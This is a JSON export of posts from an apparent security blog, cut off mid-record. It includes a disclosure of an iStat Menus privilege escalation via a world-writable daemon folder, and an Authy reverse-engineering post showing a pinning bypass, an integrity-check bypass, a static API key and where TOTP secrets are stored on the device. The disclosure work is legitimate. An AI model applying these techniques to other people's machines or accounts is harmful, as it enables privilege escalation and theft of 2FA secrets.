[{"categories":null,"contents":"This blog post covers a boring local privilege escalation bug in iStat Menus due to a misconfigured folder permission. I was honestly surprised this was overlooked, since there were other recently disclosed vulnerabilities, one of which was way more interesting. Read here.\nTL;dr Insecure world-writable folder allowing privilege escalation Affected versions \u0026lt; 7.20.5 with Install Helper component No profit (a reboot is required) A CVE has been requested Description In my day-to-day job I occasionally review software for security issues. I came across an app called iStat Menus by Bjango software. The app is basically like the Apple\u0026rsquo;s activity monitor but on steriods. It allows users to recieve notifications, monitor network usage, and much more.\nDuring the initial install you will be asked to install the Install Helper. This is actually the vulnerable component. You will be asked to provided sudo privileges to continue. If you skip this step you won\u0026rsquo;t be affected by this bug.\nOnce installed a new privileged service called com.bjango.istatmenus.daemon will be present. The full path of this binrary is:\n/Library/Application\\ Support/iStat\\ Menus\\ 7/com.bjango.istatmenus.daemon And the parent folder of this service:\nHighlighted in orange, we can clearly see the permission drwxrwxrwx is set. Other users can read, write, and execute that folder. The com.bjango.istatmenus.daemon is owned by root but the upper directory is misconfigured which may lead to privilege escalation.\nYou could also inspect the com.bjango.istatmenus.installer.log in Console to see where the problem starts.\n... 2026-02-16 23:59:51.894 com.bjango.istatmenus.installer[98143:44761071] Starting with bundle - /Applications/iStat Menus.app/Contents/Resources/Components.bundle 2026-02-16 23:59:51.894 com.bjango.istatmenus.installer[98143:44761071] /bin/mkdir /Library/Application\\ Support/iStat\\ Menus\\ 7/ 2026-02-16 23:59:51.914 com.bjango.istatmenus.installer[98143:44761071] /usr/sbin/chown -R root:wheel /Library/Application\\ Support/iStat\\ Menus\\ 7/ 2026-02-16 23:59:51.932 com.bjango.istatmenus.installer[98143:44761071] /bin/chmod -R 777 /Library/Application\\ Support/iStat\\ Menus\\ 7/ The last line with /bin/chmod -R 777.\nHow to abuse this? Easy, replace the com.bjango.istatmenus.daemon binary with a malicious one. But there is a catch, low privileged users are not able to restart this service. However, we can do a reboot which macOS system will happily restart the service.\nThis vulnerability is more of a concern to corporate devices with policies that restrict user sudo access, rather than home devices because most of us are running admin accounts anyway, and can quickly elevate to root.\nDownload Note: The official site https://bjango.com/mac/istatmenus/ will only download the latest (patched) version. To follow along you can use the link (CDN) below. The last affected version is iStat Menus 7.20.4 (2265) and is available at:\nhttps://cdn.istatmenus.app/files/istatmenus7/versions/iStatMenus7.20.4.zip Uninstall Even after you uninstall the app, there are several start-up scripts and background services that still remain. The following commands should remove all of them. I\u0026rsquo;m not sure why the default uninstaller doesn\u0026rsquo;t do this.\nsudo rm -rf /Library/PrivilegedHelperTools/com.bjango.istatmenus.installer sudo rm -rf /Library/LaunchDaemons/com.bjango.istatmenus.installer.plist sudo rm -rf /Library/Application\\ Support/iStat\\ Menus\\ 7 sudo launchctl remove com.bjango.istatmenus.status sudo launchctl remove com.bjango.istatmenus.agent sudo launchctl remove com.bjango.istatmenus.installer Summary This vulnerability reminded me of my OSCP course. There was a very similar challenge flag on a Windows system which allowed regular users to elevate to system by editing an insecure path that contained a binrary. But the user didn\u0026rsquo;t have permissions to restart the service. The trick was to reboot the machine and let Windows start the service for you.\nAlways remember to go for the low hanging fruits.\n","permalink":"https://markuta.com/istat-menus-local-privilege-escalation/","title":"iStat Menus \u003c 7.20.5 local privilege escalation"},{"categories":null,"contents":"Update 3/11/2025: The issue has now been resolved.\nThis will probably be fixed in a few hours. As for the 7 people that actually use cloudflared (like me :P) here\u0026rsquo;s a quick fix. A cached copy of the file is available here.\nPublic key rollover I recently tried upgrading the cloudflared package on my Fedora 42 system. But received a warning about invalid signature due to an expired key. Official documentation about a Public Key Rollover on 30th October 2025. Quick fix, just update the GPG keys right? Wrong.\nUnresolved hostname Okay, this is strange. The official repo https://pkg.cloudflare.com/cloudflared.repo for CentOS, Amazon Linux, and RHEL Generic systems like Fedora, all have a new baseurl. A hostname called pkg-beta.tun.cfdata.org.\nWhen trying to install or upgrade the cloudflared package we get this:\nsudo dnf install cloudflared ... Updating and loading repositories: cloudflared-stable ???% | 0.0 B/s | 0.0 B | 00m00s \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Usable URL not found Repositories loaded. Failed to resolve the transaction: No match for argument: cloudflared You can try to add to command line: --skip-unavailable to skip unavailable packages The root domain cfdata.org IS registered, and belongs to CloudFlare from public Whois records. But for some reason, the sub-domain doesn\u0026rsquo;t have a DNS record pointing to an IP address or CNAME.\nI was a bit confused and thought it might be my local DNS settings. Nope.\nUsing dig +short a pkg-beta.tun.cfdata.org @1.1.1.1 also returned a NX (Non-Existent record).\nEasy fix Update your /etc/yum.repos.d/cloudflare.repo file, and replace the baseurl= with:\n# Remove this baseurl=https://pkg-beta.tun.cfdata.org/cloudflared/rpm # Replace with baseurl=https://pkg.cloudflare.com/cloudflared/rpm After that, you can update your repo and install/upgrade the cloudflared package like before.\n... [2/2] Total 100% | 21.1 MiB/s | 19.2 MiB | 00m01s Importing OpenPGP key 0x8D4E5E73: UserID : \u0026#34;CloudFlare Software Packaging 2025 \u0026lt;help@cloudflare.com\u0026gt;\u0026#34; Fingerprint: CC94B39C77AE7342A68B89628A682D308D4E5E73 From : https://pkg.cloudflare.com/cloudflare-public-v2.gpg Is this ok [y/N]: y The key was successfully imported. [1/3] Verify package files 100% | 23.0 B/s | 1.0 B | 00m00s [2/3] Prepare transaction 100% | 3.0 B/s | 1.0 B | 00m00s [3/3] Installing cloudflared-0:2025.10.1-1.x86_64 100% | 57.1 MiB/s | 39.3 MiB | 00m01s Complete! ","permalink":"https://markuta.com/cloudflared-repo-issues/","title":"Cloudflared unresolvable repository"},{"categories":null,"contents":"I recently upgraded my home network router from a pfSense SG-1100 to a Ubiquiti Unifi Gateway Ultra. The main reason I upgraded was because I already had a unifi switch and unifi wireless access points, and so wanted to complete the eco-system.\nISP limitation My ISP uses Carrier-Grade NAT or CGN which means it uses a IPv4 network shared with other house-holds. It also means I cannot port forward services like VPNs to the Internet. A static IP address is available but it\u0026rsquo;s £5 extra a month.\nAs the title of this blog post suggests, I will be using IPv6 which my ISP also provides.\nUnifi console The MAC Address Clone option is enabled and matches the MAC of my ISP supplied device\u0026rsquo;s WAN interface. This was the only way I could get both IPv4 and IPv6 addresses to appear in the web console.\nIPv4 - Uses DHCPv4 with CloudFlare\u0026rsquo;s DNS resolvers 1.1.1.1 and 1.0.0.1. IPv6 - Uses DHCPv6 with prefix delegation size /56 (depends on your ISP). However, I soon found out that this wasn\u0026rsquo;t enough\u0026hellip;\nCreate a VPN server instance I\u0026rsquo;m not going to bore you with how to create a server. But when a new VPN instance is created the server IP address will ALWAYS be the WAN IPv4 address. There is no way to supply a IPv6 address, at least from the new web console interface.\nI\u0026rsquo;ve also noticed the Wireguard VPN server listens on all interfaces. However, when trying to connect to my WAN IPv6 address the handshake never completes. The OpenVPN VPN only listens on the WAN IPv4 interface.\nroot@UCG-Ultra:/# netstat -luntp | grep -iE \u0026#39;1194|51820\u0026#39; tcp 0 0 100.xx.xx.xx:1194 0.0.0.0:* LISTEN 725345/openvpn udp 0 0 0.0.0.0:51820 0.0.0.0:* - udp6 0 0 :::51820 :::* - It\u0026rsquo;s also possible that my ISP is somehow blocking outbound UDP but that\u0026rsquo;s unlikely.\nCreate Firewall rules Created two rules rules to allow external traffic on IPv6. Here is a screenshot of the new \u0026ldquo;Zones\u0026rdquo; feature for managing firewall rules on Unifi web console. It\u0026rsquo;s actually pretty neat!\nBut even after setting these rules I still couldn\u0026rsquo;t get either OpenVPN or Wireguard to connect.\nUsing socat to forward IPv6 to IPv4 Yes, we can use socat to forward IPv6 network packets to the CGNAT WAN IPv4 address. There is probably a better way, but this one worked well. Here\u0026rsquo;s a quick command and options I used:\nsocat TCP6-LISTEN:6666,reuseaddr,fork TCP4:100.xx.xx.xx:1194 What the options mean:\nTCP6-LISTEN:6666 - listen on all IPv6 interfaces on TCP port 6666 reuseaddr - allows an immediate restart of the server process fork - each connection spawns a child new process (do not terminate connection) TCP4:100.XX.XX.XX:1194 destination WAN CGNAT IPv4 address for OpenVPN server If socat doesn\u0026rsquo;t exist, install it with apt install socat (uses Debian as base OS).\nCreate a system service We will also create a new service that will start every time the device reboots. Create a file called /etc/systemd/system/socat-vpn-redirect.service and add the following (update to match your settings):\n[Unit] Description=socat service for OpenVPN server IPv6 to IPv4 After=openvpn.service Requires=openvpn.service [Service] Type=simple SyslogIdentifier=socat-vpn-redirect ExecStart=socat -d TCP6-LISTEN:6666,reuseaddr,fork TCP4:100.xx.xx.xx:1194 Restart=always [Install] WantedBy=multi-user.target We also want to make sure the service starts after the OpenVPN service.\nTo start the service to at every reboot type systemctl enable socat-vpn-redirect, and run the service type systemctl start socat-vpn-redirect. Here\u0026rsquo;s an example of the service running:\nroot@UCG-Ultra:/usr# systemctl status socat-vpn-redirect ● socat-vpn-redirect.service - socat service for OpenVPN server IPv6 to IPv4 Loaded: loaded (/etc/systemd/system/socat-vpn-redirect.service; disabled; vendor preset: enabled) Active: active (running) since Mon 2025-03-03 22:46:11 GMT; 1min 27s ago Main PID: 2479605 (socat) Tasks: 1 (limit: 3529) Memory: 692.0K CPU: 10ms CGroup: /system.slice/socat-vpn-redirect.service └─2479605 socat -d TCP6-LISTEN:6666,reuseaddr,fork TCP4:100.xx.xx.xx:1194 Mar 03 22:46:11 UCG-Ultra systemd[1]: Started socat service for OpenVPN server IPv6 to IPv4. Mar 03 22:46:11 UCG-Ultra socat-vpn-redirect[2479605]: 2025/03/03 22:46:11 socat[2479605] W ioctl(5, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device root@UCG-Ultra:/usr# netstat -tupan | grep -i 6666 tcp6 0 0 :::6666 :::* LISTEN 2479605/socat Useful A couple of links of users experiencing the same issues:\nSupport for IPv6 VPN-Server (WireGuard) (ui.com 2024)\nWireGuard server connection through ipv6 - help needed (ui.com 2024)\nVpn with IPv6 (or IPv4 behind a cgnat) (ui.com 2024)\nUDP Pro - VPN/IPv6 (reddit 2020)\nSummary It\u0026rsquo;s 2025 and Ubuniqti are still yet to support basic IPv6 configurations. This short guide may be useful for those who don\u0026rsquo;t mind using IPv6 for VPN access, and save £5 per month on their ISP bill. Or for those with no choice but using IPv6 to expose services.\n","permalink":"https://markuta.com/unifi-ipv6-vpn/","title":"Unifi Gateway Ultra and IPv6 VPN"},{"categories":null,"contents":"Overview This post should help users who want to create offline backups of Authy TOTPs secrets, using a rooted Android device, or a patched .APK file. I wrote a python script which can be used to import and export token secrets into a standardized format, including (re)generating QR codes.\nI briefly cover app reversing, specifically the API endpoints for device registration. Once a device is registered, each request uses 3 OTP tokens as URL parameters that rotate every 7 seconds. These OTPs are generated by the app using a secret seed, which is unique per account or device. These were extracted by using Frida trace.\nI used Burp, jadx-gui, frida and frida-trace to do most of the hard work.\nIf you just want to download the tool you can jump to the Download section. You can also skip to the using-a-physical-device section, as I had issues with using a virtual device.\nQuick Demo A short demo of the tool working on the latest version of Authy 25.1.1.\nRecent Twilio leak The recent breach leak of Twilio in 2024 allowed attackers to disclose millions of users\u0026rsquo; phone numbers and account IDs. This eventually appeared on various online forums for free, maybe because the information wasn\u0026rsquo;t that valuable? not sure.\nThe vulnerable API endpoint in question was most likely: api.authy.com/users/{COUNTRY-CODE}-{CELL-NUMBER}/status, which also required the static api_key key, which could be easily extracted from the app.\nPrevious research There has been great previous research on reversing Authy which I found helpful:\nhttps://gist.github.com/gboudreau/94bb0c11a6209c82418d01a59d958c93 (2024) - A detailed tutorial on how to extract TOTP tokens using the Authy desktop app (macOS, Windows, and Linux). Note: This method will not work past August 2024, which is kind of why I wrote this blog.\nhttps://www.codejam.info/2021/09/authy-reversed.html (2021) - Similar to the above but they also made a nice little website project to export/import using a JS which can be found here.\nhttps://randomoracle.wordpress.com/2017/02/15/extracting-otp-seeds-from-authy/ (2017) - A quite interesting technique, where they were able to extract the secret seed by debugging the web browser extension of Authy (no longer available).\nOther useful tools and scripts: https://github.com/alexzorin/authy\nAnalysis Using a virtual device Let\u0026rsquo;s first try the app on an emulated Android device.\nLuckily the Android version of Authy is available on the Google PlayStore. Not many developers allow this whilst running as virtual device, but it\u0026rsquo;s nice it\u0026rsquo;s there. I used the Android Studio emulator installed with Google APIs. This is good as it saved me some time from using a physical device. In the end it didn\u0026rsquo;t\u0026hellip;\nYou can find out how to root an emulated device here.\nTo use the app I needed to enter a phone number, which is an annoying requirement. I assume this is used to prevent account spam or to verify backup feature, as well as the SMS tokens. Or possibly analytics too? - not quite sure.\nBut before using an already registered phone number, I wanted to use this opportunity to observe the registration process with a \u0026ldquo;fresh\u0026rdquo; account, in particular the API endpoints to see if there\u0026rsquo;s anything interesting.\nNetwork interception I basically setup Android Studio proxy settings to point to Burp. I also have a few pass-through domains which are not intercepted, mostly default google communications and others.\ncertificate pinning I quickly hit a slight road block. Burp reported there was a TLS certificate error for the hostname api.authy.com:443. This usually means there\u0026rsquo;s some sort of certificate pinning in place, which needs to be bypassed if we\u0026rsquo;re want to inspect any https content.\nfrida bypass It\u0026rsquo;s relatively simple process to bypass. But that also depends on the mobile application. A few apps use complex Runtime Application Self Protection (RASP) libraries, which are typically there to slow down attackers. However, with enough time and expertise, most can be bypassed. I\u0026rsquo;ve always been impressed with the work by Romain Thomas.\nAfter trying a few scripts I found this one that worked. I\u0026rsquo;m now able to inspect TLS traffic.\nWell crap\u0026hellip; another road block. I get a HTTP 403 Forbidden response.\nGoogle Integrity checks What the hell is a Google Integrity API token ?\nA quote from their official developer website:\n\u0026ldquo;Call the Integrity API at important moments in your app to check that user actions and requests are coming from your unmodified app binary, installed by Google Play, running on a genuine Android device. Your app’s backend server can decide what to do next to prevent abuse, unauthorized access, and attacks\u0026rdquo;.\nSo Authy uses this library to decide whether or not a device is safe to register an account on. If it isn\u0026rsquo;t then the backend server will prevent us from continuing with the registration or login process. This could be due to a variety of reasons e.g. emulated device, rooted device, frida running, or something else.\nI should\u0026rsquo;ve really checked this earlier. But both Basic Integrity and CTS Profile match checks fail on the emulated device. This is the most likely reason Authy app rejects our requests. But of course, if you have root access, you have options.\nSome options were to: 1) try to install a few Magisk modules to bypass the checks. 2) ditch the emulator and use a rooted physical device instead, also with Magisk modules. Or 3) patch the Auhy app or Google APIs manually, which is probably the most difficult and time consuming.\nI tried using these Magisk modules PlayIntegrityFix and LSPosed:\nadb push PlayIntegrityFix_v16.5.zip /storage/emulated/0/Download adb push LSPosed-v1.9.2-7024-zygisk-release.zip /storage/emulated/0/Download However, none of these modules worked. I even tried a device spoofer.\nUsing a physical device Okay, after messing about with a virtual device and not getting very far, I moved onto using a real Google Pixel 3a. Annoyingly, I again ran into errors with Google\u0026rsquo;s integrity API and device verification. I still couldn\u0026rsquo;t register my device or login into the Authy app.\nAfter a bit of research, I found some success with these two Magisk modules:\nShamiko version 300 from here PlayIntegrity Fix from here I could finally register the device and monitor the network traffic flow.\nDevice Registration The initial POST request sent to api.authy.com includes a generated integrity_token, along with a static api_key which is also found in the app. Other device information (like IP address in the header) is also included:\nPOST /json/devices/access_tokens/fetch?device_app=authy\u0026amp;api_key=37b312a3d682b823c439522e1fd31c82\u0026amp;locale=en Host: api.authy.com User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 3a Build/QQ1A.191205.011) Mobile X-Authy-Device-Uuid: authy::abcdfe1234567890 X-Authy-Device-App: authy X-Authy-Request-Id: 78159512-e965-43ab-946c-17d3c172b4fb X-Authy-Private-Ip: xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx Content-Type: application/json; charset=UTF-8 Content-Length: 626 Connection: Keep-Alive Accept-Encoding: gzip, deflate, br {\u0026#34;device_uuid\u0026#34;:\u0026#34;authy::abcdfe1234567890\u0026#34;,\u0026#34;integrity_token\u0026#34;:\u0026#34;CtUC...5rBk\u0026#34;,\u0026#34;platform\u0026#34;:\u0026#34;Android\u0026#34;} And the response:\nHTTP/2 200 OK Date: Sun, 07 Jul 2024 20:00:59 GMT Content-Type: application/json;charset=utf-8 Server: nginx X-Content-Type-Options: nosniff {\u0026#34;token\u0026#34;:\u0026#34;eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs\u0026#34;,\u0026#34;success\u0026#34;:true} If the accepted, the server responds with a JSON object that includes a new token, which will be used as the Attestation-Access-Token HTTP header for subsequent requests.\nA HTTP GET request is then sent with the user phone number and device UUID:\nNote: This is the API endpoint that was likely abused by attackers to find verified account phone numbers. Authy now have added the Attestation-Access-Token header to try to prevent this (of sorts).\nGET /json/users/44-0-700-000-0000/status?uuid=authy%3A%3Aabcdfe1234567890\u0026amp;device_app=authy\u0026amp;api_key=37b312a3d682b823c439522e1fd31c82\u0026amp;locale=en HTTP/2 Host: api.authy.com User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 3a Build/QQ1A.191205.011) Mobile X-Authy-Device-Uuid: authy::abcdfe1234567890 X-Authy-Device-App: authy X-Authy-Request-Id: 78159512-e965-43ab-946c-17d3c172b4fb X-Authy-Private-Ip: xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx Attestation-Access-Token: eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs Connection: Keep-Alive Accept-Encoding: gzip, deflate, br And the response:\nHTTP/2 200 OK Date: Sun, 07 Jul 2024 20:00:59 GMT Content-Type: application/json;charset=utf-8 Server: nginx X-Content-Type-Options: nosniff {\u0026#34;force_ott\u0026#34;:false,\u0026#34;primary_email_verified\u0026#34;:false,\u0026#34;message\u0026#34;:\u0026#34;new\u0026#34;,\u0026#34;success\u0026#34;:true} This response indicates that the mobile number supplied is not verified, but also doesn\u0026rsquo;t have a associated email with that number.\nThe next POST request is made with user supplied details: email address, phone number, country code and a signature (not sure where this is from) as well as, the Attestation-Access-Token HTTP header:\nPOST /json/users/new?device_app=authy\u0026amp;api_key=37b312a3d682b823c439522e1fd31c82\u0026amp;locale=en HTTP/2 Host: api.authy.com User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 3a Build/QQ1A.191205.011) Mobile X-Authy-Device-Uuid: authy::abcdfe1234567890 X-Authy-Device-App: authy X-Authy-Request-Id: 78159512-e965-43ab-946c-17d3c172b4fb X-Authy-Private-Ip: xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx Attestation-Access-Token: eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: Keep-Alive Accept-Encoding: gzip, deflate, br country_code=44\u0026amp;cellphone=0-700-000-0000\u0026amp;email=test%40example.com\u0026amp;signature=xxxxxxxxxxxxxxxx With the response:\nHTTP/2 200 OK Date: Sun, 07 Jul 2024 20:01:52 GMT Content-Type: application/json;charset=utf-8 Server: nginx X-Content-Type-Options: nosniff {\u0026#34;message\u0026#34;:\u0026#34;Account was created.\u0026#34;,\u0026#34;authy_id\u0026#34;:00000001,\u0026#34;registration_token\u0026#34;:\u0026#34;eyJh...uk58\u0026#34;,\u0026#34;success\u0026#34;:true} Apparently, the Attestation-Access-Token HTTP header was added recently to make it harder for users to register \u0026ldquo;unsafe\u0026rdquo; devices. But more so, to avoid abuse of their APIs. I\u0026rsquo;ve mostly seen it used during account registration but other requests too.\nReviewing local app data After registering an account, I was then able to add a few example TOTPs to see how they are stored on the app. Access to /data/data/{APP.NAME}/ folder is restricted on Android. You must have root access. This is because it\u0026rsquo;s a protected folder where each app has its own folder and permissions.\nI made a copy of /data/data/com.authy.authy and started to explore its contents:\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Apps/Authy/com.authy.authy/shared_prefs $ ls -lha total 328 drwxr-x--x 38 naz staff 1.2K 7 Jul 22:44 . drwx------ 10 naz staff 320B 7 Jul 21:54 .. -rw-r----- 1 naz staff 281B 7 Jul 21:00 ACCESS_TOKEN_PREFERENCES_NAME.xml -rw-r----- 1 naz staff 675B 7 Jul 21:54 FirebaseHeartBeatW0RFRkFVTFRd+MTo4MTIyMjcxMzI4MjE6YW5kcm9pZDphNDdkMzk0MWVkZDEzZDc4.xml -rw-r----- 1 naz staff 981B 7 Jul 21:50 FirebasePerfSharedPrefs.xml -rw-r----- 1 naz staff 65B 7 Jul 21:05 SignUpRegistrationPreferences.xml -rw-r----- 1 naz staff 624B 7 Jul 21:04 VERIFY.xml -rw-r----- 1 naz staff 239B 7 Jul 20:55 authy.storage.appSettingsV2.xml -rw-r----- 1 naz staff 65B 7 Jul 21:30 cacheTokenConfig.xml -rw-r----- 1 naz staff 730B 7 Jul 21:54 com.authy.authy.activities.TokensActivity.xml -rw-r----- 1 naz staff 238B 7 Jul 21:30 com.authy.authy.analytics_info_storage.xml -rw-r----- 1 naz staff 126B 7 Jul 21:03 com.authy.authy.config.InHouseConfig.xml -rw-r----- 1 naz staff 210B 7 Jul 21:30 com.authy.authy.enable_backup_reminder.xml -rw-r----- 1 naz staff 114B 7 Jul 20:55 com.authy.authy.models.LockManager$Lock.xml -rw-r----- 1 naz staff 248B 7 Jul 21:32 com.authy.authy.models.PasswordTimeStamp.xml -rw-r----- 1 naz staff 450B 7 Jul 21:05 com.authy.authy.models.analytics.authentication.AnalyticsTokenStorage.xml -rw-r----- 1 naz staff 114B 7 Jul 20:55 com.authy.authy.storage.AppSettingsStorage$AppSettings.xml -rw-r----- 1 naz staff 198B 7 Jul 21:35 com.authy.authy.storage.DeletionDetailsStorage.xml -rw-r----- 1 naz staff 114B 7 Jul 21:05 com.authy.authy.storage.DevicesStorage.xml -rw-r----- 1 naz staff 114B 7 Jul 21:05 com.authy.authy.storage.UserIdStorage$UserId.xml -rw-r----- 1 naz staff 441B 7 Jul 21:05 com.authy.authy.storage.UserInfoStorage.xml -rw-r----- 1 naz staff 147B 7 Jul 22:44 com.authy.authy_preferences.xml -rw-r----- 1 naz staff 369B 7 Jul 21:33 com.authy.storage.authenticator_password_manager.xml -rw-r----- 1 naz staff 265B 7 Jul 21:05 com.authy.storage.default_user_id_provider.xml -rw-r----- 1 naz staff 899B 7 Jul 21:39 com.authy.storage.tokens.authenticator.xml -rw-r----- 1 naz staff 180B 7 Jul 20:55 com.authy.storage.tokens.authy.xml -rw-r----- 1 naz staff 23K 7 Jul 21:05 com.authy.storage.tokens_config_v2.xml -rw-r----- 1 naz staff 113B 7 Jul 21:05 com.authy.storage.tokens_config_version.xml -rw-r----- 1 naz staff 65B 7 Jul 21:05 com.authy.storage.tokens_grid_comparator.xml -rw-r----- 1 naz staff 839B 7 Jul 22:44 com.google.android.gms.measurement.prefs.xml -rw-r----- 1 naz staff 333B 7 Jul 21:00 com.google.firebase.crashlytics.xml -rw-r----- 1 naz staff 137B 7 Jul 20:55 com.google.firebase.messaging.xml -rw-r----- 1 naz staff 154B 7 Jul 21:29 com.google.mlkit.internal.xml -rw-r----- 1 naz staff 3.0K 7 Jul 21:05 enpt.xml -rw-r----- 1 naz staff 692B 7 Jul 21:56 frc_1:812227132821:android:a47d3941edd13d78_firebase_settings.xml -rw-r----- 1 naz staff 434B 7 Jul 21:01 frc_1:812227132821:android:a47d3941edd13d78_fireperf_settings.xml -rw-r----- 1 naz staff 141B 7 Jul 21:05 prefs.passwordReminder.xml -rw-r----- 1 naz staff 1.4K 7 Jul 21:30 tokenConfig.xml Searching for known keywords like my example email account and issuer.\nThe com.authy.storage.tokens.authenticator.xml file inside the shared_prefs folder stores ALL your TOTPs secrets on the device. It contains a decrypted and encrypted seed secret of each TOTP account. It also uses HTML encoding for specific quote symbols \u0026amp;quote; but this can be easily removed.\nHere is an example:\n\u0026lt;?xml version=\u0026#39;1.0\u0026#39; encoding=\u0026#39;utf-8\u0026#39; standalone=\u0026#39;yes\u0026#39; ?\u0026gt; \u0026lt;map\u0026gt; \u0026lt;int name=\u0026#34;key_version\u0026#34; value=\u0026#34;1026\u0026#34; /\u0026gt; \u0026lt;string name=\u0026#34;com.authy.storage.tokens.authenticator.key\u0026#34;\u0026gt;[ {\u0026#34;accountType\u0026#34;:\u0026#34;authenticator\u0026#34;,\u0026#34;decryptedSecret\u0026#34;:\u0026#34;wjjgnyerozgx3reoyxzukommt4\u0026#34;,\u0026#34;digits\u0026#34;:6,\u0026#34;encryptedSecret\u0026#34;:\u0026#34;vk6L0v2pw696prZJ9avJxt9hhF4GHXNB/bNx8Kwi/bU\\u003d\u0026#34;,\u0026#34;key_derivation_iterations\u0026#34;:100000,\u0026#34;logo\u0026#34;:\u0026#34;Example\u0026#34;,\u0026#34;originalIssuer\u0026#34;:\u0026#34;Example\u0026#34;,\u0026#34;originalName\u0026#34;:\u0026#34;Example Co:lol@example.com\u0026#34;,\u0026#34;timestamp\u0026#34;:1720384210,\u0026#34;salt\u0026#34;:\u0026#34;raL6WCaojHWWxZndFRlFmbshXpce2jM6\u0026#34;,\u0026#34;upload_state\u0026#34;:\u0026#34;uploaded\u0026#34;,\u0026#34;hidden\u0026#34;:false,\u0026#34;id\u0026#34;:\u0026#34;1720384210\u0026#34;,\u0026#34;isNew\u0026#34;:false,\u0026#34;name\u0026#34;:\u0026#34;Example Co: lol@example.com\u0026#34;}, {\u0026#34;accountType\u0026#34;:\u0026#34;authenticator\u0026#34;,\u0026#34;decryptedSecret\u0026#34;:\u0026#34;AUSJD7LZ5H27TAC7NW2IJMATDMVDUPUG\u0026#34;,\u0026#34;digits\u0026#34;:6,\u0026#34;encryptedSecret\u0026#34;:\u0026#34;AKQz/j3PN3La3xwPL8ou3AHW9kMs9CpVgOU7QjaMeswxRlqYaLqkDYutUdJysXX2\u0026#34;,\u0026#34;key_derivation_iterations\u0026#34;:100000,\u0026#34;logo\u0026#34;:\u0026#34;ACME Co\u0026#34;,\u0026#34;originalIssuer\u0026#34;:\u0026#34;ACME Co\u0026#34;,\u0026#34;originalName\u0026#34;:\u0026#34;ACME Co:jdoe@example.com\u0026#34;,\u0026#34;timestamp\u0026#34;:1720384369,\u0026#34;salt\u0026#34;:\u0026#34;smWX7wlzBB6xr3H1evpcd721KcZhpkvd\u0026#34;,\u0026#34;upload_state\u0026#34;:\u0026#34;uploaded\u0026#34;,\u0026#34;hidden\u0026#34;:false,\u0026#34;id\u0026#34;:\u0026#34;1720731300\u0026#34;,\u0026#34;isNew\u0026#34;:false,\u0026#34;name\u0026#34;:\u0026#34;ACME Co: jdoe@example.com\u0026#34;}] \u0026lt;/string\u0026gt; \u0026lt;/map\u0026gt; Within the XML is a string with the name com.authy.storage.tokens.authenticator.key. This contains an array list of JSON objects. Here is the same data just formatted better:\n[{ \u0026#34;accountType\u0026#34;: \u0026#34;authenticator\u0026#34;, \u0026#34;decryptedSecret\u0026#34;: \u0026#34;wjjgnyerozgx3reoyxzukommt4\u0026#34;, \u0026#34;digits\u0026#34;: 6, \u0026#34;encryptedSecret\u0026#34;: \u0026#34;vk6L0v2pw696prZJ9avJxt9hhF4GHXNB/bNx8Kwi/bU\\u003d\u0026#34;, \u0026#34;key_derivation_iterations\u0026#34;: 100000, \u0026#34;logo\u0026#34;: \u0026#34;Example\u0026#34;, \u0026#34;originalIssuer\u0026#34;: \u0026#34;Example\u0026#34;, \u0026#34;originalName\u0026#34;: \u0026#34;Example Co:lol@example.com\u0026#34;, \u0026#34;timestamp\u0026#34;: 1720384210, \u0026#34;salt\u0026#34;: \u0026#34;raL6WCaojHWWxZndFRlFmbshXpce2jM6\u0026#34;, \u0026#34;upload_state\u0026#34;: \u0026#34;uploaded\u0026#34;, \u0026#34;hidden\u0026#34;: false, \u0026#34;id\u0026#34;: \u0026#34;1720384210\u0026#34;, \u0026#34;isNew\u0026#34;: false, \u0026#34;name\u0026#34;: \u0026#34;Example Co: lol@example.com\u0026#34; }, { \u0026#34;accountType\u0026#34;: \u0026#34;authenticator\u0026#34;, \u0026#34;decryptedSecret\u0026#34;: \u0026#34;AUSJD7LZ5H27TAC7NW2IJMATDMVDUPUG\u0026#34;, \u0026#34;digits\u0026#34;: 6, \u0026#34;encryptedSecret\u0026#34;: \u0026#34;AKQz/j3PN3La3xwPL8ou3AHW9kMs9CpVgOU7QjaMeswxRlqYaLqkDYutUdJysXX2\u0026#34;, \u0026#34;key_derivation_iterations\u0026#34;: 100000, \u0026#34;logo\u0026#34;: \u0026#34;ACME Co\u0026#34;, \u0026#34;originalIssuer\u0026#34;: \u0026#34;ACME Co\u0026#34;, \u0026#34;originalName\u0026#34;: \u0026#34;ACME Co:jdoe@example.com\u0026#34;, \u0026#34;timestamp\u0026#34;: 1720384369, \u0026#34;salt\u0026#34;: \u0026#34;smWX7wlzBB6xr3H1evpcd721KcZhpkvd\u0026#34;, \u0026#34;upload_state\u0026#34;: \u0026#34;uploaded\u0026#34;, \u0026#34;hidden\u0026#34;: false, 